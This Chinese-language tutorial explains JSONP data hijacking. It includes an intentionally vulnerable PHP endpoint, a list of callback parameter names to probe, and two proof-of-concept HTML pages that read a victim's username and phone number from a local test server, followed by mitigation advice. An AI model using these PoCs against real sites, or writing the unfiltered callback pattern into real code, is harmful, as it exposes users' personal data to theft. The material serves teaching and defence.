位置: IT常识 - 正文

JSONP数据劫持漏洞(json解析漏洞)

编辑:rootadmin
JSONP数据劫持漏洞 ​介绍

推荐整理分享JSONP数据劫持漏洞(json解析漏洞),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:json劫持漏洞验证方法,json数据解析错误是什么意思,json数据解析错误是什么意思,jsonp漏洞利用,json loads dumps,jsonp漏洞利用,json劫持漏洞验证方法,json劫持怎么防止,内容如对您有帮助,希望把文章链接给更多的朋友!

JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。

更通俗的说法:JSONP 就是利用 <script> 标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用 callback 函数。

漏洞原理

和 CSRF 类似,都需要用户交互,而 CSRF 主要是以用户的账户进行增删改的操作,jsonp 则主要用来劫持数据。

当网站通过 JSONP 方式传递用户敏感信息时,攻击者可以伪造 JSONP 调用页面,诱导被攻击者访问来达到窃取用户信息的目的;jsonp 数据劫持就是攻击者获取了本应该传给网站其他接口的数据。

漏洞代码

假设这是目标网站上的代码,然后我们利用漏洞就可以劫持到里面的数据,如username、phone

<?php//test.phpheader('Content-type: application/json');$callback = $_GET['callback'];print $callback.'({"username" : "d4m1ts","phone" : "13888888888"});';?>

快速启动 php 环境

php -S 127.0.0.1:9999 实现效果

利用场景

如上图,所有包含有callback等回调函数的,且请求方式为 GET,没有验证 referer 等,都可以尝试下该漏洞

如果返回内容是 json 格式的,但是没有回调函数,我们可以尝试手动添加回调函数去试试运气,一些常见的如下:

_callback=mstkey_cb=mstkeycallback=mstkeycb=mstkeyjsonp=mstkeyjsonpcallback=mstkeyjsonpcb=mstkeyjsonp_cb=mstkeyjson=mstkeyjsoncallback=mstkeyjcb=mstkeycall=mstkeycallBack=mstkeyjsonpCallback=mstkeyjsonpCb=mstkeyjsonp_Cb=mstkeyjsonCallback=mstkeyca=mstkey漏洞利用

当我们发现信息泄露的 jsonp 接口以后,我们需要构造一个恶意 html 页面,然后引诱受害者去访问这个网站,一旦访问了这个网站,脚本就会自动运行,就会向这个接口请求用户的敏感数据,并传送到攻击者的服务器上。

POC基于实现回调函数<script>function xxx(data){ alert(data.username);}</script><script src="http://127.0.0.1:9999/test.php?callback=xxx"></script>JSONP数据劫持漏洞(json解析漏洞)

保存为 html,诱导受害者访问,可见成功获取到了username信息

image-20220322171224615

简而言之:存在信息泄漏的 JSONP 接口http://127.0.0.1:9999/test.php?callback=xxx,攻击者构造 POC 后诱导用户访问 POC,然后就会调用这个接口获取到敏感数据,获取到的敏感数据被攻击者截获了。

另一个 POC基于 jquery<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script><script type="text/javascript"> $.getJSON("http://127.0.0.1:9999/test.php?callback=?", function(data){ alert(data.phone); });</script>

image-20220322173916125

修复建议

扩展

修复建议

接受请求时检查referer来源;

在请求中添加token并在后端进行验证;

严格过滤 callback 函数名及 JSON 里数据的输出。

扩展

如果目标的 header 头没有设置Content-Type为json,而是html,那么也可以造成 XSS 漏洞

一个获取 QQ 号的 JSONP 劫持实例[1]

image-20220322185037473

推荐阅读:JSONP 挖掘与高级利用[2]

参考资料

[1]一个获取 QQ 号的 JSONP 劫持实例: http://www.piaoyi.org/network/get-qq-haoma-js.html

[2]JSONP 挖掘与高级利用: http://drops.xmd5.com/static/drops/papers-6630.html

本文链接地址:https://www.jiuchutong.com/zhishi/299576.html 转载请保留说明!

上一篇:单目测距原理与实现(代码可运行)(单目测距精度)

下一篇:强化学习——Q-Learning算法原理

  • 六税两费减半征收政策
  • 公司成立前发生业务 成立后开票
  • 土地增值税计入固定资产清理
  • 事业单位资产划转流程
  • 已经认证不能抵扣怎么办
  • 个人股权转让需要注意什么
  • 企业所得税预缴计算方法
  • 怎样进行房产置换的账务处理
  • 个体工商户需要缴纳哪些税
  • 企业预收款项业务不多的情况下可以不设置预收账款科目
  • 拿租金抵押金如何做账?
  • 备用金可以银行贷款吗
  • 交强险和车船税必须一起交吗
  • 317房地产政策解读
  • 房地产企业销售现房是否预缴增值税
  • 如何理解消费税的作用
  • 安装费要交税吗
  • 监理费该谁出
  • 固定资产的领用
  • 购买东西押金不退要怎么处理
  • 工会职工活动支出标准
  • 增值税普票当月开错了怎么办
  • 固定资产转无形资产怎么做账
  • 蝾螈白话怎么读
  • PHP:Memcached::increment()的用法_Memcached类
  • 税收返还的账务处理
  • 小规模纳税人购车是怎么抵税的
  • 财务报表的组成部分
  • 银行承兑汇票挂失手续费收费标准
  • 管理费用怎么记凭证
  • 企业之间拆借资金
  • 麒麟软件的linux桌面操作系统
  • 多缴税金抵税会怎么样
  • 织梦怎么采集文章
  • python装饰器如何保留原函数信息
  • 现金收款凭证是发票吗
  • 生产车间的辅助记录
  • 生产车间发放工资
  • 工会经费通过应交税费科目核算吗
  • 个税手续费发给财务人员 文件
  • 个税专项附加扣除标准调整
  • 专票已认证还能作废吗
  • 以前年度出口退税未收汇
  • 增量留底退税基金怎么算
  • 签订三方协议是办理实时扣税的前提,这里三方是指
  • 办公设备维修费会计分录
  • 招标公司的成本控制
  • 纳税期限与申报期限的区别
  • 税金附加科目有哪些
  • 福利费与工会经费使用区别
  • 如何证明自己是中国人
  • 员工出国境有关说法
  • 小规模申请自开发票流程
  • 公司如何做账本
  • 设置账本应当遵循哪些原则
  • MySQL 5.0.96 for Windows x86 32位绿色精简版安装教程
  • Mysql执行sql文件
  • win8 preview
  • PureVoice.exe - PureVoice是什么进程 有什么用
  • LiteSpeed添加虚拟主机+支持htaccess图文教程
  • npssvc.exe - npssvc是什么进程 有什么用
  • windows打补丁后无法启动
  • win10预览文件怎么显示内容
  • win10 无线热点
  • Linux 后台执行程序如何操作?
  • linux如何使用
  • linux ssh gui
  • jquery移动节点的方法
  • jquery使用jsonp
  • 搭建入门
  • js设置标签内容
  • android基础入门教程
  • win7 python
  • js html css
  • python multinomial
  • HttpClient.execute() 阻塞问题
  • javascript零基础
  • 税务更名需要什么材料
  • 黄金增值税管理难点
  • 税务党课主题或党课题目
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设